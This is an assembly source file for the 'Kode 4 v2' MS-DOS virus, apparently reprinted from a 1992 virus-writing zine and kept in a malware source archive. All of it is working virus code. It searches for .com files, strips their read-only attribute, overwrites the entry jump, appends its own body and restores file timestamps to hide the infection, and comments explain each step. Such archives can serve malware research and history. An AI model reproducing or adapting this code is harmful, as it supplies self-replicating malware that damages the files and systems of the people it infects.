MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.kode4v2.asm
2021-01-12 17:47:04 -06:00

192 lines
6.7 KiB
NASM

ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #2 - YAM '92
Article Title: Kode 4 v2 Virus
Author: Soltan Griss
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
V_Length equ vend-vstart
KODE4 proc far
start label near
db 0E9h,00h,00h
vstart equ $
mov si,100h ;get si to point to 100
mov di,102h ;get di to point to 102
lback: inc di ;increment di
mov ax,word ptr [si] ;si is ponting to ax
cmp word ptr [di],ax ;compare ax with di loc
jne lback ;INE go back and inc di
mov ax,word ptr [si+1]
cmp ax,word ptr [di+1]
je lout
jmp lback
lout: add di,3h ;jmp stored in the end
sub di,(v_length+100h) ;+3 to get to end and -
mov si,di ;
;**********************************************************************
;*
;* The above code can be re-written as follows...
;* The above idea, although it works is very long in code....
;* when DOS does a load and execute it pushes all registers the last
;* register to be pushed contains the file length. so just subtract
;* the current location
;**********************************************************************
;
;
;
;Host_Off: pop bp
; sub bp,offset host_off
; mov si,bp
;
;*** Before opening any file copy the original three bytes back to 100h
;*** Because they will get overwritten when you check any new files
lea di,temp_buff
add di,si
mov ax,word ptr [di]
mov cl,byte ptr [di+2]
mov di,100h
mov word ptr [di],ax
mov byte ptr [di+2],cl
mov ah,4Eh ;Find first Com file
mov dx,offset filename ; offset of "*.com"
add dx,si
int 21h
jnc back
jmp done
Back:
mov ah,43h ;get rid of read only
mov al,0
mov dx,9eh
int 21h
mov ah,43h
mov al,01
and cx,11111110b
int 21h
mov ax,3D02h ;Open file for read/writing
mov dx,9Eh ;get file name from file DTA
int 21h
jnc next
jmp done
next: mov bx,ax ;save handle in bx
mov ah,57h ;get time date
mov al,0
int 21h
push cx ;put in stack for later
push dx
mov ax,4200h ; Move ptr to start of file
xor cx,cx
xor dx,dx
int 21h
mov ah,3fh ;load first 3 bytes
mov cx,3
mov dx,offset temp_buff
add dx,si
int 21h
xor cx,cx ;move file pointer to end of file
xor dx,dx
mov ax,4202h
int 21h
sub ax,3 ; Fix for real location
push ax
; nop ;
; nop ; used for debugging
; nop ;
; nop ;
; nop
mov di,offset temp_buff
add di,si
mov word ptr [j_code2+si],ax; Save two bytes in a
; word [jumpin]
cmp byte ptr [di],0e9h ;look for a jmp at begining
jne infect
mov cx,word ptr [di+1] ;check for XXX bytes at end
pop ax
sub ax,v_length
cmp ax, cx ; jump (id string to check)
jne infect
jmp finish
infect:
xor cx,cx ;move file pointer to begining
xor dx,dx ;to write jump
mov ax,4200h
int 21h
mov ah,40h ;write jump in first 3 bytes
mov cx,3
mov dx, offset j_code1
add dx,si
int 21h
xor cx,cx ;move file pointer to end of file
xor dx,dx
mov ax, 4202h
int 21h
mov dx,offset vstart
add dx,si ;Start writing at top of virus
mov cx,(vend-vstart) ; Set for length of virus
mov ah,40h ;Write Data into the file
int 21h
Finish: pop dx ;Restore old dates and times
pop cx
mov ah,57h
mov al,01h
int 21h
mov ah,3Eh ;Close the file
int 21h
mov ah,4Fh ;Find Next file
int 21h
jc done
jmp back
done:
mov bp,100h
jmp bp
filename db "*.com",0
DATA db " -=+ Kode4 +=-, The one and ONLY!$"
j_code1 db 0e9h
j_code2 db 00h,00h
temp_buff db 0cdh,020h,090h ; CD 20 NOP
kode4 endp
vend equ $
seg_a ends
end start